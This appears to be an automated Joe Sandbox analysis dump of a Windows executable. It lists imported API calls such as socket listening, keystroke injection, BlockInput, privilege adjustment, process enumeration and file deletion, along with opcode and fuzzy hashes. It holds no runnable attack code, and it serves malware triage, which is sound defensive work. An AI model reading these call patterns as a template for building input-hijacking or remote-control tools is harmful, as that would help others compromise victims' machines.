                                        • WSAGetLastError.WSOCK32 ref: 00C712C5
                                        • closesocket.WSOCK32(00000000), ref: 00C712F4
                                        • listen.WSOCK32(00000000,00000005), ref: 00C71303
                                        • WSAGetLastError.WSOCK32 ref: 00C7130D
                                        • closesocket.WSOCK32(00000000), ref: 00C7133C
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        APIs
                                        • _free.LIBCMT ref: 00C2B9D4
                                        • _free.LIBCMT ref: 00C2B9F8
                                        • _free.LIBCMT ref: 00C2BB7F
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C93700), ref: 00C2BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C2BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC1270,000000FF,?,0000003F,00000000,?), ref: 00C2BC36
                                        • _free.LIBCMT ref: 00C2BD4B
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        APIs
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                          • Part of subcall function 00C5E199: GetFileAttributesW.KERNEL32(?,00C5CF95), ref: 00C5E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C5D420
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5D470
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5D481
                                        • FindClose.KERNEL32(00000000), ref: 00C5D498
                                        • FindClose.KERNEL32(00000000), ref: 00C5D4A1
                                        Strings
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C664DC
                                        • CoInitialize.OLE32(00000000), ref: 00C66639
                                        • CoCreateInstance.OLE32(00C8FCF8,00000000,00000001,00C8FB68,?), ref: 00C66650
                                        • CoUninitialize.OLE32 ref: 00C668D4
                                        Strings
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00C722E8
                                          • Part of subcall function 00C6E4EC: GetWindowRect.USER32(?,?), ref: 00C6E504
                                        • GetDesktopWindow.USER32 ref: 00C72312
                                        • GetWindowRect.USER32(00000000), ref: 00C72319
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C72355
                                        • GetCursorPos.USER32(?), ref: 00C72381
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C723DF
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C69B78
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C69C8B
                                          • Part of subcall function 00C63874: GetInputState.USER32 ref: 00C638CB
                                          • Part of subcall function 00C63874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C63966
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C69BA8
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C69C75
                                        Strings
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C09A4E
                                        • GetSysColor.USER32(0000000F), ref: 00C09B23
                                        • SetBkColor.GDI32(?,00000000), ref: 00C09B36
                                        Similarity
                                        • API ID: Color$LongProcWindow
                                        • String ID:
                                        • API String ID: 3131106179-0
                                        APIs
                                          • Part of subcall function 00C7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C7307A
                                          • Part of subcall function 00C7304E: _wcslen.LIBCMT ref: 00C7309B
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C7185D
                                        • WSAGetLastError.WSOCK32 ref: 00C71884
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C718DB
                                        • WSAGetLastError.WSOCK32 ref: 00C718E6
                                        • closesocket.WSOCK32(00000000), ref: 00C71915
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        APIs
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7A6AC
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00C7A6BA
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00C7A79C
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7A7AB
                                          • Part of subcall function 00C0CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C33303,?), ref: 00C0CE8A
                                        Similarity
                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                        • String ID:
                                        • API String ID: 1991900642-0
                                        APIs
                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C5AAAC
                                        • SetKeyboardState.USER32(00000080), ref: 00C5AAC8
                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C5AB36
                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C5AB88
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        APIs
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00C6CE89
                                        • GetLastError.KERNEL32(?,00000000), ref: 00C6CEEA
                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00C6CEFE
                                        Similarity
                                        • API ID: ErrorEventFileInternetLastRead
                                        • String ID:
                                        • API String ID: 234945975-0
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C582AA
                                        Strings
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C65CC1
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C65D17
                                        • FindClose.KERNEL32(?), ref: 00C65D5F
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 00C2271A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C22724
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00C22731
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C651DA
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C65238
                                        • SetErrorMode.KERNEL32(00000000), ref: 00C652A1
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        APIs
                                          • Part of subcall function 00C0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C10668
                                          • Part of subcall function 00C0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C10685
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5170D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5173A
                                        • GetLastError.KERNEL32 ref: 00C5174A
                                        Similarity
                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                        • String ID:
                                        • API String ID: 577356006-0
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C5D608
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C5D645
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C5D650
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 884a52bd61316001a5e1454c31a71394ad70327be0f21a9783a71a738de6e689
                                        • Instruction ID: e90cc5a043918b4459ff7cc14a27042afb469fd6aa41c8bbb58c73e50714dd60
                                        • Opcode Fuzzy Hash: 884a52bd61316001a5e1454c31a71394ad70327be0f21a9783a71a738de6e689
                                        • Instruction Fuzzy Hash: E1118E75E01328BFDB208F95DC84FAFBBBCEB45B60F108111F914E7290C6704A058BA5
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C5168C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C516A1
                                        • FreeSid.ADVAPI32(?), ref: 00C516B1
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: 0bf0cea703c002ff7f6719c423743ec5ad7addd57f3568c287db94d30ea854d2
                                        • Instruction ID: 5c3045f47618d20092f4845f3e0d9384c2bcad18982ae9b99979304a3349e419
                                        • Opcode Fuzzy Hash: 0bf0cea703c002ff7f6719c423743ec5ad7addd57f3568c287db94d30ea854d2
                                        • Instruction Fuzzy Hash: 7DF04475940308FBDB00CFE0DC89FAEBBBCEB08240F104460E900E2180E730AA448B64
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00C228E9,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002,00000000,?,00C228E9), ref: 00C14D09
                                        • TerminateProcess.KERNEL32(00000000,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002,00000000,?,00C228E9), ref: 00C14D10
                                        • ExitProcess.KERNEL32 ref: 00C14D22
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: ef288ac24271ab48209f935d0b12f756b894178257918619d884ea7ef76c97e9
                                        • Instruction ID: bc10f62689508b1d8fb56412af77828a2a8de048b81d9e84b4e1af40d8f59084
                                        • Opcode Fuzzy Hash: ef288ac24271ab48209f935d0b12f756b894178257918619d884ea7ef76c97e9
                                        • Instruction Fuzzy Hash: 0BE0B631000148ABCF15BF54ED49B9C3B69FB42B91B104014FC198A132CB39EE82EB94
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: fecccfe320c5131ff96f9355d759dc25eb1a0c086e7a558e1920e31c34ddaf8f
                                        • Instruction ID: 8e61449db1cfc1619ddf56e2501c58b3650f9cf0bde3b969b01c3e4420b75f0a
                                        • Opcode Fuzzy Hash: fecccfe320c5131ff96f9355d759dc25eb1a0c086e7a558e1920e31c34ddaf8f
                                        • Instruction Fuzzy Hash: EA413876500229ABCB24DFB9EC88EFF7778EB84314F104669F915C7590E6309E81CB50
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00C4D28C
                                        Strings
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: 8ff101be5e0b47f22f1718abc60e0dca52477384f17f119adfa6d3928148a451
                                        • Instruction ID: 740debc41f745b0ea90b58572a7d9eed501f83106c2970c5324b831e4864145f
                                        • Opcode Fuzzy Hash: 8ff101be5e0b47f22f1718abc60e0dca52477384f17f119adfa6d3928148a451
                                        • Instruction Fuzzy Hash: DAD0C9B480511DEBCB90DB90DCC8EDDB77CBB04345F100191F506A2140D77095488F20
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction ID: 6670da9a36e392478df25802b2ee7d3b7116f0dbf74b481832e7dc6ac1136184
                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction Fuzzy Hash: 65021C71E402199FDF14CFA9D8906EDBBF1EF49314F258169E829E7380D730AE419B84
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C66918
                                        • FindClose.KERNEL32(00000000), ref: 00C66961
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 37d22c70ee7f7c3eed8a669b9a25cab503336c4987c7ba1a13e8ea6761c7670a
                                        • Instruction ID: f364b01002d0291b6d5048349b88a08b894117306ae27eb9a9059f5128cb3292
                                        • Opcode Fuzzy Hash: 37d22c70ee7f7c3eed8a669b9a25cab503336c4987c7ba1a13e8ea6761c7670a
                                        • Instruction Fuzzy Hash: F2118E316042059FD710DF29D4C4A2AFBE5EF85328F14C699E9698F6A2CB30EC49CB91
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C74891,?,?,00000035,?), ref: 00C637E4
                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C74891,?,?,00000035,?), ref: 00C637F4
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 31aa241d3f74a99b4ca79f2d45069102120158d913f9a4e9987b0510a213972a
                                        • Instruction ID: b37968bbff4b269321e7a561f1bfff04ba85a5321203b0e9d7810c82bc4659b7
                                        • Opcode Fuzzy Hash: 31aa241d3f74a99b4ca79f2d45069102120158d913f9a4e9987b0510a213972a
                                        • Instruction Fuzzy Hash: ECF0E5B06042286AE72057B69C8DFEB3AAEEFC4761F000165F509D32D1D9709945C7B0
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C5B25D
                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00C5B270
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: 85d58d5534979431ee75fbe1036ae9f5c23f0475c3920d8e296ee59bed4137ee
                                        • Instruction ID: cecb2f98292743a8482f99bcbf73a9f2ccdf1637c7905965a9a25e5f057059e6
                                        • Opcode Fuzzy Hash: 85d58d5534979431ee75fbe1036ae9f5c23f0475c3920d8e296ee59bed4137ee
                                        • Instruction Fuzzy Hash: 6EF01D7580424EABDF059FA1C805BAE7FB4FF04305F008009F965A5192C77986559FA8
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C511FC), ref: 00C510D4
                                        • CloseHandle.KERNEL32(?,?,00C511FC), ref: 00C510E9
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: bc87bb4240c6fc6b932ca97cc81809953acb07612de8ebdcf54973b82fa1261a
                                        • Instruction ID: 4ccb0719e7ebca8967cb01fc7bd99e01778f85f7e69fadb5b38e0ff39bcea8d3
                                        • Opcode Fuzzy Hash: bc87bb4240c6fc6b932ca97cc81809953acb07612de8ebdcf54973b82fa1261a
                                        • Instruction Fuzzy Hash: 45E04F32004600AEE7252B61FC09F7777A9EB04320F24882DF8A5804F1DB72ACD1EB64
                                        Strings
                                        • Variable is not of type 'Object'., xrefs: 00C40C40
                                        Similarity
                                        • API ID:
                                        • String ID: Variable is not of type 'Object'.
                                        • API String ID: 0-1840281001
                                        • Opcode ID: 6ffb66895e80f7a39eb27018633bf91d48d8e7e53ac472fc282d97f41ac56bb5
                                        • Instruction ID: da96d6a33ba5b04d69cce06910ff7a7375ebca32ea758fa906afcfd399e5003a
                                        • Opcode Fuzzy Hash: 6ffb66895e80f7a39eb27018633bf91d48d8e7e53ac472fc282d97f41ac56bb5
                                        • Instruction Fuzzy Hash: BA324A7490021C9BCF14DF94CA81AFDBBF5FF04304F2440A9EA16AB292D775AE89DB51
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C26766,?,?,00000008,?,?,00C2FEFE,00000000), ref: 00C26998
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: e15537669af3765af2a7ee3cd32d1cbe23abc84996e88b92fe5f3c04aeb78f64
                                        • Instruction ID: 1971768d346db4b959df0d54dc115534e5ff3edf93b4755051f11500da3b09fa
                                        • Opcode Fuzzy Hash: e15537669af3765af2a7ee3cd32d1cbe23abc84996e88b92fe5f3c04aeb78f64
                                        • Instruction Fuzzy Hash: 2AB15A31610618DFD719CF28D48AB657BE0FF05364F258698E8A9CF6E2C735EA81CB50
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 03e99d8b6a2fcbb1c543f5e47de19f3de1069bd839ae25cd96a4635f012a4c01
                                        • Instruction ID: d9e7c658eaa7fda0285758055044a9b210f41161a9aa1f00a6c4883a3cdc250e
                                        • Opcode Fuzzy Hash: 03e99d8b6a2fcbb1c543f5e47de19f3de1069bd839ae25cd96a4635f012a4c01
                                        • Instruction Fuzzy Hash: 8C126071D002299BDB24CF99C8806EEB7F5FF48710F14819AE849EB295DB349E85CF90
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00C6EABD
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: c726f4085c32f1298783de59c7138ca59dc38b5cfaf19ff3362a0292b32a0673
                                        • Instruction ID: bd620766755ce0b34db25aad78ba9a15c9702feef1b6c8c45b0291360de3e822
                                        • Opcode Fuzzy Hash: c726f4085c32f1298783de59c7138ca59dc38b5cfaf19ff3362a0292b32a0673
                                        • Instruction Fuzzy Hash: A6E04F352102089FC710EF9AD894E9AFBE9AF98760F00846AFD49C7351DB70E8448BA0
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00C103EE), ref: 00C109DA
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 208748286aa7cbd5268d71ab2a14f382a0a8c3e80279be8455379df01578aaeb
                                        • Instruction ID: c0f1be094facfe399ceac26cb9976b406c46d3489e7b62a52e329e541ed4b6c0
                                        • Opcode Fuzzy Hash: 208748286aa7cbd5268d71ab2a14f382a0a8c3e80279be8455379df01578aaeb
                                        • Instruction Fuzzy Hash:
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction ID: fe169e50378ca3bf2f5c419baec2494cdbb265ec9691ceb11c5171cf0793d7f4
                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction Fuzzy Hash: 8F51496160C6455BFB388569895D7FE63B99B03340F180709E8A2EB2C2C615DFCAF356
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70a39f55a5eee6f9efa8592cc8d4504d03f8d2e0720277072d89b7b931bb4d64
                                        • Instruction ID: a01924a4060980837470544137e7b073f899ea2ab3c54473be3a1274efbfc8ac
                                        • Opcode Fuzzy Hash: 70a39f55a5eee6f9efa8592cc8d4504d03f8d2e0720277072d89b7b931bb4d64
                                        • Instruction Fuzzy Hash: E2323532D29F114DDB239634ECA6339A249AFB73C5F15D737E82AB5DA5EB28C5834100
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c90238ef09f90a7e5dc7f5796bd31d5985fe42645ad4ace83fa68d1958c34baf
                                        • Instruction ID: cc0a6d281e97bcb194c560adca89adeafddf631b2b76129488e3fa456eb146c8
                                        • Opcode Fuzzy Hash: c90238ef09f90a7e5dc7f5796bd31d5985fe42645ad4ace83fa68d1958c34baf
                                        • Instruction Fuzzy Hash: 22321531A011558BDF68CF29C4D06BD7BA1FB45314F29866AD86A9B2F2D330DE81EB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f20b7c0f683a69b1b2773aa2366413430d4b3075cb3820c33ce7f912953e4d48
                                        • Instruction ID: d7703d652c64ed057ab071415362b0b1c62d9ef4dfccc038c50ed7b368a848a2
                                        • Opcode Fuzzy Hash: f20b7c0f683a69b1b2773aa2366413430d4b3075cb3820c33ce7f912953e4d48
                                        • Instruction Fuzzy Hash: FE22A170A04609DFDF14CF65C881ABEB7F6FF44300F2046A9E816A7291EB36AE55DB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d02e6fdb9039b4093d271f4ae69fd5339abb3e3c5bcfc380c59b775baa3af0d
                                        • Instruction ID: acbc6e7ce674bc78bc0d85496dddb3a81b84b5dcb0cba513753db6678f004131
                                        • Opcode Fuzzy Hash: 5d02e6fdb9039b4093d271f4ae69fd5339abb3e3c5bcfc380c59b775baa3af0d
                                        • Instruction Fuzzy Hash: 9102C6B0A10209EBDF04DF54D881BAEBBF1FF44300F108169E9169B2D0EB31AE65DB94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bea3d08dc0a3e1c6de67ebe3017a4d2cc94e0b325b4b0093905e473b4c3ddedf
                                        • Instruction ID: 3157d210cf6851ad290b5594cb374fb4c846e68f951ed6a220ee6ae13d2bb721
                                        • Opcode Fuzzy Hash: bea3d08dc0a3e1c6de67ebe3017a4d2cc94e0b325b4b0093905e473b4c3ddedf
                                        • Instruction Fuzzy Hash: D2B1F120D6AF905DD3239639883533AB65CBFBB6D5F91D31BFC2674D62EB2286834140
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: 2d81fd3c9bf53d47c937498aea5a27f7e525e9c64f3179aa44453de5e0fc442d
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: 3A9178722080A34ADB2A467A95740BDFFE15E533A171D079DDDF2CA1C1FE18C694F620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: c653a5ecfb7363f791370d582fbd84a6970e22646925927ba4ee14e2d587644f
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: C491537220D0A34ADB29467A85740BDFFE15A933A271E079DD9F2CA1C1FD18D6A4F620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
